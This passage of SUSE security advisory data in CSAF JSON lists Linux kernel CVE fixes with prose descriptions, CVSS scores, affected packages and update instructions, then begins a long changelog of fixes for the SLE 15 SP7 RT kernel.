__x64_sys_exit_group+0x3f/0x40 kernel/exit.c:1121\n x64_sys_call+0x2210/0x2210 arch/x86/include/generated/asm/syscalls_64.h:232\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xe8/0xf80 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n RIP: 0033:0x44f639\n Code: Unable to access opcode bytes at 0x44f60f.\n RSP: 002b:00007ffc15c4e088 EFLAGS: 00000246 ORIG_RAX: 00000000000000e7\n RAX: ffffffffffffffda RBX: 00000000004c32f0 RCX: 000000000044f639\n RDX: 000000000000003c RSI: 00000000000000e7 RDI: 0000000000000001\n RBP: 0000000000000001 R08: ffffffffffffffc0 R09: 0000000000000000\n R10: 0000000000000000 R11: 0000000000000246 R12: 00000000004c32f0\n R13: 0000000000000001 R14: 0000000000000000 R15: 0000000000000001\n \u003c/TASK\u003e\n\nSince rescue mount options will mark the full fs read-only, there should\nbe no new transaction triggered.\n\nBut during unmount we will evict all inodes, which can trigger a new\ntransaction, and triggers warnings on a heavily corrupted fs.\n\n[CAUSE]\nBtrfs allows new transaction even on a read-only fs, this is to allow\nlog replay happen even on read-only mounts, just like what ext4/xfs do.\n\nHowever with rescue mount options, the fs is fully read-only and cannot\nbe remounted read-write, thus in that case we should also reject any new\ntransactions.\n\n[FIX]\nIf we find the fs has rescue mount options, we should treat the fs as\nerror, so that no new transaction can be started.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23214",
"url": "https://www.suse.com/security/cve/CVE-2026-23214"
},
{
"category": "external",
"summary": "SUSE Bug 1258464 for CVE-2026-23214",
"url": "https://bugzilla.suse.com/1258464"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23214"
},
{
"cve": "CVE-2026-23221",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23221"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbus: fsl-mc: fix use-after-free in driver_override_show()\n\nThe driver_override_show() function reads the driver_override string\nwithout holding the device_lock. However, driver_override_store() uses\ndriver_set_override(), which modifies and frees the string while holding\nthe device_lock.\n\nThis can result in a concurrent use-after-free if the string is freed\nby the store function while being read by the show function.\n\nFix this by holding the device_lock around the read operation.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23221",
"url": "https://www.suse.com/security/cve/CVE-2026-23221"
},
{
"category": "external",
"summary": "SUSE Bug 1258660 for CVE-2026-23221",
"url": "https://bugzilla.suse.com/1258660"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23221"
},
{
"cve": "CVE-2026-23222",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23222"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: omap - Allocate OMAP_CRYPTO_FORCE_COPY scatterlists correctly\n\nThe existing allocation of scatterlists in omap_crypto_copy_sg_lists()\nwas allocating an array of scatterlist pointers, not scatterlist objects,\nresulting in a 4x too small allocation.\n\nUse sizeof(*new_sg) to get the correct object size.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23222",
"url": "https://www.suse.com/security/cve/CVE-2026-23222"
},
{
"category": "external",
"summary": "SUSE Bug 1258484 for CVE-2026-23222",
"url": "https://bugzilla.suse.com/1258484"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23222"
},
{
"cve": "CVE-2026-23229",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23229"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: virtio - Add spinlock protection with virtqueue notification\n\nWhen VM boots with one virtio-crypto PCI device and builtin backend,\nrun openssl benchmark command with multiple processes, such as\n openssl speed -evp aes-128-cbc -engine afalg -seconds 10 -multi 32\n\nopenssl processes will hangup and there is error reported like this:\n virtio_crypto virtio0: dataq.0:id 3 is not a head!\n\nIt seems that the data virtqueue need protection when it is handled\nfor virtio done notification. If the spinlock protection is added\nin virtcrypto_done_task(), openssl benchmark with multiple processes\nworks well.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23229",
"url": "https://www.suse.com/security/cve/CVE-2026-23229"
},
{
"category": "external",
"summary": "SUSE Bug 1258429 for CVE-2026-23229",
"url": "https://bugzilla.suse.com/1258429"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23229"
}
]
}
SUSE-SU-2026:0587-1
Vulnerability from csaf_suse - Published: 2026-02-20 10:04 - Updated: 2026-02-20 10:04Summary
Security update for the Linux Kernel
Severity
Important
Notes
Title of the patch: Security update for the Linux Kernel
Description of the patch:
The SUSE Linux Enterprise 15 SP7 RT kernel was updated to fix various security issues
The following security issues were fixed:
- CVE-2023-54013: interconnect: Fix locking for runpm vs reclaim (bsc#1256280).
- CVE-2025-39880: libceph: fix invalid accesses to ceph_connection_v1_info (bsc#1250388).
- CVE-2025-40238: net/mlx5: Fix IPsec cleanup over MPV device (bsc#1254871).
- CVE-2025-40254: net: openvswitch: remove never-working support for setting nsh fields (bsc#1254852).
- CVE-2025-40257: mptcp: fix a race in mptcp_pm_del_add_timer() (bsc#1254842).
- CVE-2025-40259: scsi: sg: Do not sleep in atomic context (bsc#1254845).
- CVE-2025-40261: nvme: nvme-fc: Ensure ->ioerr_work is cancelled in nvme_fc_delete_ctrl() (bsc#1254839).
- CVE-2025-40264: be2net: pass wrb_params in case of OS2BMC (bsc#1254835).
- CVE-2025-40328: smb: client: fix potential UAF in smb2_close_cached_fid() (bsc#1254624).
- CVE-2025-40350: net/mlx5e: RX, Fix generating skb from non-linear xdp_buff for striding RQ (bsc#1255260).
- CVE-2025-40355: sysfs: check visibility before changing group attribute ownership (bsc#1255261).
- CVE-2025-40363: net: ipv6: fix field-spanning memcpy warning in AH output (bsc#1255102).
- CVE-2025-68171: x86/fpu: Ensure XFD state on signal delivery (bsc#1255255).
- CVE-2025-68174: amd/amdkfd: enhance kfd process check in switch partition (bsc#1255327).
- CVE-2025-68178: blk-cgroup: fix possible deadlock while configuring policy (bsc#1255266).
- CVE-2025-68188: tcp: use dst_dev_rcu() in tcp_fastopen_active_disable_ofo_check() (bsc#1255269).
- CVE-2025-68200: bpf: Add bpf_prog_run_data_pointers() (bsc#1255241).
- CVE-2025-68215: ice: fix PTP cleanup on driver removal in error path (bsc#1255226).
- CVE-2025-68227: mptcp: Fix proto fallback detection with BPF (bsc#1255216).
- CVE-2025-68241: ipv4: route: Prevent rt_bind_exception() from rebinding stale fnhe (bsc#1255157).
- CVE-2025-68245: net: netpoll: fix incorrect refcount handling causing incorrect cleanup (bsc#1255268).
- CVE-2025-68261: ext4: add i_data_sem protection in ext4_destroy_inline_data_nolock() (bsc#1255164).
- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255377).
- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255401).
- CVE-2025-68296: drm, fbcon, vga_switcheroo: Avoid race condition in fbcon setup (bsc#1255128).
- CVE-2025-68297: ceph: fix crash in process_v2_sparse_read() for encrypted directories (bsc#1255403).
- CVE-2025-68301: net: atlantic: fix fragment overflow handling in RX path (bsc#1255120).
- CVE-2025-68320: lan966x: Fix sleeping in atomic context (bsc#1255172).
- CVE-2025-68325: net/sched: sch_cake: Fix incorrect qlen reduction in cake_drop (bsc#1255417).
- CVE-2025-68327: usb: renesas_usbhs: Fix synchronous external abort on unbind (bsc#1255488).
- CVE-2025-68337: jbd2: avoid bug_on in jbd2_journal_get_create_access() when file system corrupted (bsc#1255482).
- CVE-2025-68349: NFSv4/pNFS: Clear NFS_INO_LAYOUTCOMMIT in pnfs_mark_layout_stateid_invalid (bsc#1255544).
- CVE-2025-68363: bpf: Check skb->transport_header is set in bpf_skb_check_mtu (bsc#1255552).
- CVE-2025-68365: fs/ntfs3: Initialize allocated memory before use (bsc#1255548).
- CVE-2025-68366: nbd: defer config unlock in nbd_genl_connect (bsc#1255622).
- CVE-2025-68367: macintosh/mac_hid: fix race condition in mac_hid_toggle_emumouse (bsc#1255547).
- CVE-2025-68372: nbd: defer config put in recv_work (bsc#1255537).
- CVE-2025-68379: RDMA/rxe: Fix null deref on srq->rq.queue after resize failure (bsc#1255695).
- CVE-2025-68727: ntfs3: Fix uninit buffer allocated by __getname() (bsc#1255568).
- CVE-2025-68728: ntfs3: fix uninit memory after failed mi_read in mi_format_new (bsc#1255539).
- CVE-2025-68733: smack: fix bug: unprivileged task can create labels (bsc#1255615).
- CVE-2025-68764: NFS: Automounted filesystems should inherit ro,noexec,nodev,sync flags (bsc#1255930).
- CVE-2025-68768: inet: frags: add inet_frag_queue_flush() (bsc#1256579).
- CVE-2025-68770: bnxt_en: Fix XDP_TX path (bsc#1256584).
- CVE-2025-68771: ocfs2: fix kernel BUG in ocfs2_find_victim_chain (bsc#1256582).
- CVE-2025-68775: net/handshake: duplicate handshake cancellations leak socket (bsc#1256665).
- CVE-2025-68776: net/hsr: fix NULL pointer dereference in prp_get_untagged_frame() (bsc#1256659).
- CVE-2025-68788: fsnotify: do not generate ACCESS/MODIFY events on child for special files (bsc#1256638).
- CVE-2025-68795: ethtool: Avoid overflowing userspace buffer on stats query (bsc#1256688).
- CVE-2025-68798: perf/x86/amd: Check event before enable to avoid GPF (bsc#1256689).
- CVE-2025-68800: mlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats (bsc#1256646).
- CVE-2025-68801: mlxsw: spectrum_router: Fix neighbour use-after-free (bsc#1256653).
- CVE-2025-68803: nfsd: set security label during create operations (bsc#1256770).
- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256641).
- CVE-2025-68814: io_uring: fix filename leak in __io_openat_prep() (bsc#1256651).
- CVE-2025-68815: net/sched: ets: Remove drr class from the active list if it changes to strict (bsc#1256680).
- CVE-2025-68816: net/mlx5: fw_tracer, Validate format string parameters (bsc#1256674).
- CVE-2025-68820: ext4: xattr: fix null pointer deref in ext4_raw_inode() (bsc#1256754).
- CVE-2025-71064: net: hns3: using the num_tqps in the vf driver to apply for resources (bsc#1256654).
- CVE-2025-71066: net/sched: ets: Always remove class from active list before deleting in ets_qdisc_change
(bsc#1256645).
- CVE-2025-71077: tpm: Cap the number of PCR banks (bsc#1256613).
- CVE-2025-71080: ipv6: fix a BUG in rt6_get_pcpu_route() under PREEMPT_RT (bsc#1256608).
- CVE-2025-71084: RDMA/cm: Fix leaking the multicast GID table reference (bsc#1256622).
- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256623).
- CVE-2025-71087: iavf: fix off-by-one issues in iavf_config_rss_reg() (bsc#1256628).
- CVE-2025-71088: mptcp: fallback earlier on simult connection (bsc#1256630).
- CVE-2025-71089: iommu: disable SVA when CONFIG_X86 is set (bsc#1256612).
- CVE-2025-71091: team: fix check for port enabled in team_queue_override_port_prio_changed() (bsc#1256773).
- CVE-2025-71093: e1000: fix OOB in e1000_tbi_should_accept() (bsc#1256777).
- CVE-2025-71094: net: usb: asix: ax88772: Increase phy_name size (bsc#1256597).
- CVE-2025-71095: net: stmmac: fix the crash issue for zero copy XDP_TX action (bsc#1256605).
- CVE-2025-71096: RDMA/core: Check for the presence of LS_NLA_TYPE_DGID correctly (bsc#1256606).
- CVE-2025-71097: ipv4: Fix reference count leak when using error routes with nexthop objects (bsc#1256607).
- CVE-2025-71098: ip6_gre: make ip6gre_header() robust (bsc#1256591).
- CVE-2025-71112: net: hns3: add VLAN id validation before using (bsc#1256726).
- CVE-2025-71116: libceph: make decode_pool() more resilient against corrupted osdmaps (bsc#1256744).
- CVE-2025-71120: SUNRPC: svcauth_gss: avoid NULL deref on zero length gss_token in gss_read_proxy_verf (bsc#1256779).
- CVE-2025-71123: ext4: fix string copying in parse_apply_sb_mount_options() (bsc#1256757).
- CVE-2025-71133: RDMA/irdma: avoid invalid read in irdma_net_event (bsc#1256733).
- CVE-2025-71135: md/raid5: fix possible null-pointer dereferences in raid5_store_group_thread_cnt() (bsc#1256761).
- CVE-2025-71137: octeontx2-pf: fix 'UBSAN: shift-out-of-bounds error' (bsc#1256760).
- CVE-2025-71149: io_uring/poll: correctly handle io_poll_add() return value on update (bsc#1257164).
- CVE-2025-71156: gve: defer interrupt enabling until NAPI registration (bsc#1257167).
- CVE-2025-71157: RDMA/core: always drop device refcount in ib_del_sub_device_and_put() (bsc#1257168).
- CVE-2026-22976: net/sched: sch_qfq: Fix NULL deref when deactivating inactive aggregate in qfq_reset (bsc#1257035).
- CVE-2026-22977: net: sock: fix hardened usercopy panic in sock_recv_errqueue (bsc#1257053).
- CVE-2026-22984: libceph: prevent potential out-of-bounds reads in handle_auth_done() (bsc#1257217).
- CVE-2026-22990: libceph: replace overzealous BUG_ON in osdmap_apply_incremental() (bsc#1257221).
- CVE-2026-22991: libceph: make free_choose_arg_map() resilient to partial allocation (bsc#1257220).
- CVE-2026-22992: libceph: return the handler error from mon_handle_auth_done() (bsc#1257218).
- CVE-2026-22993: idpf: Fix RSS LUT NULL pointer crash on early ethtool operations (bsc#1257180).
- CVE-2026-22996: net/mlx5e: Don't store mlx5e_priv in mlx5e_dev devlink priv.
- CVE-2026-22999: net/sched: sch_qfq: do not free existing class in qfq_change_class() (bsc#1257236).
- CVE-2026-23000: net/mlx5e: Fix crash on profile change rollback failure (bsc#1257234).
- CVE-2026-23001: macvlan: fix possible UAF in macvlan_forward_source() (bsc#1257232).
- CVE-2026-23005: x86/fpu: Clear XSTATE_BV in guest XSAVE state whenever XFD[i]=1 (bsc#1257245).
- CVE-2026-23011: ipv4: ip_gre: make ipgre_header() robust (bsc#1257207).
The following non security issues were fixed:
- ALSA: ctxfi: Fix potential OOB access in audio mixer handling (stable-fixes).
- ALSA: scarlett2: Fix buffer overflow in config retrieval (git-fixes).
- ALSA: usb-audio: Fix use-after-free in snd_usb_mixer_free() (git-fixes).
- ALSA: usb-audio: Update for native DSD support quirks (stable-fixes).
- ALSA: usb: Increase volume range that triggers a warning (git-fixes).
- ASoC: Intel: sof_es8336: fix headphone GPIO logic inversion (git-fixes).
- ASoC: amd: yc: Add quirk for Honor MagicBook X16 2025 (stable-fixes).
- ASoC: codecs: wsa881x: Drop unused version readout (stable-fixes).
- ASoC: codecs: wsa881x: fix unnecessary initialisation (git-fixes).
- ASoC: codecs: wsa883x: fix unnecessary initialisation (git-fixes).
- ASoC: codecs: wsa884x: fix codec initialisation (git-fixes).
- ASoC: fsl: imx-card: Do not force slot width to sample width (git-fixes).
- ASoC: fsl_sai: Add missing registers to cache default (stable-fixes).
- ASoC: tlv320adcx140: fix null pointer (git-fixes).
- ASoC: tlv320adcx140: fix word length (git-fixes).
- Bluetooth: MGMT: Fix memory leak in set_ssp_complete (git-fixes).
- Bluetooth: hci_uart: fix null-ptr-deref in hci_uart_write_work (git-fixes).
- HID: usbhid: paper over wrong bNumDescriptor field (stable-fixes).
- Input: i8042 - add quirk for ASUS Zenbook UX425QA_UM425QA (stable-fixes).
- Input: i8042 - add quirks for MECHREVO Wujie 15X Pro (stable-fixes).
- NFS: Fix up the automount fs_context to use the correct cred (git-fixes).
- NFSD/blocklayout: Fix minlength check in proc_layoutget (git-fixes).
- NFSD: Fix permission check for read access to executable-only files (git-fixes).
- NFSD: use correct reservation type in nfsd4_scsi_fence_client (git-fixes).
- NFSv4: ensure the open stateid seqid doesn't go backwards (git-fixes).
- RDMA/mana_ib: Access remote atomic for MRs (git-fixes).
- RDMA/mana_ib: Add device statistics support (git-fixes).
- RDMA/mana_ib: Add port statistics support (git-fixes).
- RDMA/mana_ib: Add support of 4M, 1G, and 2G pages (git-fixes).
- RDMA/mana_ib: Add support of mana_ib for RNIC and ETH nic (git-fixes).
- RDMA/mana_ib: Allow registration of DMA-mapped memory in PDs (git-fixes).
- RDMA/mana_ib: Create and destroy UD/GSI QP (git-fixes).
- RDMA/mana_ib: Drain send wrs of GSI QP (git-fixes).
- RDMA/mana_ib: Extend modify QP (git-fixes).
- RDMA/mana_ib: Fix error code in probe() (git-fixes).
- RDMA/mana_ib: Fix integer overflow during queue creation (git-fixes).
- RDMA/mana_ib: Handle net event for pointing to the current netdev (bsc#1256690).
- RDMA/mana_ib: Implement DMABUF MR support (git-fixes).
- RDMA/mana_ib: Query feature_flags bitmask from FW (git-fixes).
- RDMA/mana_ib: UD/GSI QP creation for kernel (git-fixes).
- RDMA/mana_ib: UD/GSI work requests (git-fixes).
- RDMA/mana_ib: Use safer allocation function() (git-fixes).
- RDMA/mana_ib: add additional port counters (git-fixes).
- RDMA/mana_ib: add support of multiple ports (git-fixes).
- RDMA/mana_ib: check cqe length for kernel CQs (git-fixes).
- RDMA/mana_ib: create kernel-level CQs (git-fixes).
- RDMA/mana_ib: create/destroy AH (git-fixes).
- RDMA/mana_ib: extend mana QP table (git-fixes).
- RDMA/mana_ib: helpers to allocate kernel queues (git-fixes).
- RDMA/mana_ib: implement get_dma_mr (git-fixes).
- RDMA/mana_ib: implement req_notify_cq (git-fixes).
- RDMA/mana_ib: indicate CM support (git-fixes).
- RDMA/mana_ib: polling of CQs for GSI/UD (git-fixes).
- RDMA/mana_ib: request error CQEs when supported (git-fixes).
- RDMA/mana_ib: support of the zero based MRs (git-fixes).
- RDMA/mana_ib: unify mana_ib functions to support any gdma device (git-fixes).
- Revert 'nfc/nci: Add the inconsistency check between the input data length and count' (git-fixes).
- USB: OHCI/UHCI: Add soft dependencies on ehci_platform (stable-fixes).
- USB: serial: ftdi_sio: add support for PICAXE AXE027 cable (stable-fixes).
- USB: serial: option: add Telit LE910 MBIM composition (stable-fixes).
- ata: libata: Add cpr_log to ata_dev_print_features() early return (git-fixes).
- bpf/selftests: test_select_reuseport_kern: Remove unused header (bsc#1257603).
- bpf: Do not let BPF test infra emit invalid GSO types to stack (bsc#1255569).
- bs-upload-kernel: Fix cve branch uploads.
- btrfs: do not strictly require dirty metadata threshold for metadata writepages (stable-fixes).
- can: ctucanfd: fix SSP_SRC in cases when bit-rate is higher than 1 MBit (git-fixes).
- can: ems_usb: ems_usb_read_bulk_callback(): fix URB memory leak (git-fixes).
- can: etas_es58x: allow partial RX URB allocation to succeed (git-fixes).
- can: gs_usb: gs_usb_receive_bulk_callback(): fix error message (git-fixes).
- can: gs_usb: gs_usb_receive_bulk_callback(): unanchor URL on usb_submit_urb() error (git-fixes).
- can: j1939: make j1939_session_activate() fail if device is no longer registered (stable-fixes).
- can: kvaser_usb: kvaser_usb_read_bulk_callback(): fix URB memory leak (git-fixes).
- can: mcba_usb: mcba_usb_read_bulk_callback(): fix URB memory leak (git-fixes).
- can: usb_8dev: usb_8dev_read_bulk_callback(): fix URB memory leak (git-fixes).
- cifs: Fix copy offload to flush destination region (bsc#1252511).
- cifs: Fix flushing, invalidation and file size with copy_file_range() (bsc#1252511).
- cifs: add new field to track the last access time of cfid (git-fixes).
- cifs: after disabling multichannel, mark tcon for reconnect (git-fixes).
- cifs: avoid redundant calls to disable multichannel (git-fixes).
- cifs: cifs_pick_channel should try selecting active channels (git-fixes).
- cifs: deal with the channel loading lag while picking channels (git-fixes).
- cifs: dns resolution is needed only for primary channel (git-fixes).
- cifs: do not disable interface polling on failure (git-fixes).
- cifs: do not search for channel if server is terminating (git-fixes).
- cifs: fix a pending undercount of srv_count (git-fixes).
- cifs: fix lock ordering while disabling multichannel (git-fixes).
- cifs: fix stray unlock in cifs_chan_skip_or_disable (git-fixes).
- cifs: fix use after free for iface while disabling secondary channels (git-fixes).
- cifs: handle servers that still advertise multichannel after disabling (git-fixes).
- cifs: handle when server starts supporting multichannel (git-fixes).
- cifs: handle when server stops supporting multichannel (git-fixes).
- cifs: make cifs_chan_update_iface() a void function (git-fixes).
- cifs: make sure server interfaces are requested only for SMB3+ (git-fixes).
- cifs: make sure that channel scaling is done only once (git-fixes).
- cifs: reconnect worker should take reference on server struct unconditionally (git-fixes).
- cifs: reset connections for all channels when reconnect requested (git-fixes).
- cifs: reset iface weights when we cannot find a candidate (git-fixes).
- cifs: serialize other channels when query server interfaces is pending (git-fixes).
- cifs: update dstaddr whenever channel iface is updated (git-fixes).
- comedi: Fix getting range information for subdevices 16 to 255 (git-fixes).
- comedi: dmm32at: serialize use of paged registers (git-fixes).
- comedi: fix divide-by-zero in comedi_buf_munge() (stable-fixes).
- cpuset: fix warning when disabling remote partition (bsc#1256794).
- crypto: authencesn - reject too-short AAD (assoclen<8) to match ESP/ESN spec (git-fixes).
- dmaengine: apple-admac: Add 'apple,t8103-admac' compatible (git-fixes).
- dmaengine: at_hdmac: fix device leak on of_dma_xlate() (git-fixes).
- dmaengine: bcm-sba-raid: fix device leak on probe (git-fixes).
- dmaengine: dw: dmamux: fix OF node leak on route allocation failure (git-fixes).
- dmaengine: idxd: fix device leaks on compat bind and unbind (git-fixes).
- dmaengine: lpc18xx-dmamux: fix device leak on route allocation (git-fixes).
- dmaengine: omap-dma: fix dma_pool resource leak in error paths (git-fixes).
- dmaengine: qcom: gpi: Fix memory leak in gpi_peripheral_config() (git-fixes).
- dmaengine: sh: rz-dmac: Fix rz_dmac_terminate_all() (git-fixes).
- dmaengine: tegra-adma: Fix use-after-free (git-fixes).
- dmaengine: ti: dma-crossbar: fix device leak on am335x route allocation (git-fixes).
- dmaengine: ti: dma-crossbar: fix device leak on dra7x route allocation (git-fixes).
- dmaengine: ti: k3-udma: fix device leak on udma lookup (git-fixes).
- dmaengine: xilinx: xdma: Fix regmap max_register (git-fixes).
- dmaengine: xilinx_dma: Fix uninitialized addr_width when 'xlnx,addrwidth' property is missing (git-fixes).
- dpll: Prevent duplicate registrations (git-fixes).
- dpll: fix device-id-get and pin-id-get to return errors properly (git-fixes).
- dpll: fix return value check for kmemdup (git-fixes).
- dpll: indent DPLL option type by a tab (git-fixes).
- dpll: spec: add missing module-name and clock-id to pin-get reply (git-fixes).
- drm/amd/display: Apply e4479aecf658 to dml (stable-fixes).
- drm/amd/display: Bump the HDMI clock to 340MHz (stable-fixes).
- drm/amd/display: Fix DP no audio issue (stable-fixes).
- drm/amd/display: Initialise backlight level values from hw (git-fixes).
- drm/amd/display: Respect user's CONFIG_FRAME_WARN more for dml files (stable-fixes).
- drm/amd/display: shrink struct members (stable-fixes).
- drm/amd/pm: Don't clear SI SMC table when setting power limit (git-fixes).
- drm/amd/pm: Workaround SI powertune issue on Radeon 430 (v2) (git-fixes).
- drm/amd/pm: fix race in power state check before mutex lock (git-fixes).
- drm/amd/pm: fix smu overdrive data type wrong issue on smu 14.0.2 (git-fixes).
- drm/amd: Clean up kfd node on surprise disconnect (stable-fixes).
- drm/amdgpu: Fix cond_exec handling in amdgpu_ib_schedule() (git-fixes).
- drm/amdgpu: Fix query for VPE block_type and ip_count (stable-fixes).
- drm/amdgpu: fix NULL pointer dereference in amdgpu_gmc_filter_faults_remove (git-fixes).
- drm/amdgpu: remove frame cntl for gfx v12 (stable-fixes).
- drm/amdkfd: Fix improper NULL termination of queue restore SMI event string (stable-fixes).
- drm/amdkfd: fix a memory leak in device_queue_manager_init() (git-fixes).
- drm/imagination: Wait for FW trace update command completion (git-fixes).
- drm/imx/tve: fix probe device leak (git-fixes).
- drm/msm/a6xx: fix bogus hwcg register updates (git-fixes).
- drm/nouveau/disp/nv50-: Set lock_core in curs507a_prepare (git-fixes).
- drm/nouveau/disp: Set drm_mode_config_funcs.atomic_(check|commit) (stable-fixes).
- drm/nouveau: add missing DCB connector types (git-fixes).
- drm/nouveau: implement missing DCB connector types; gracefully handle unknown connectors (git-fixes).
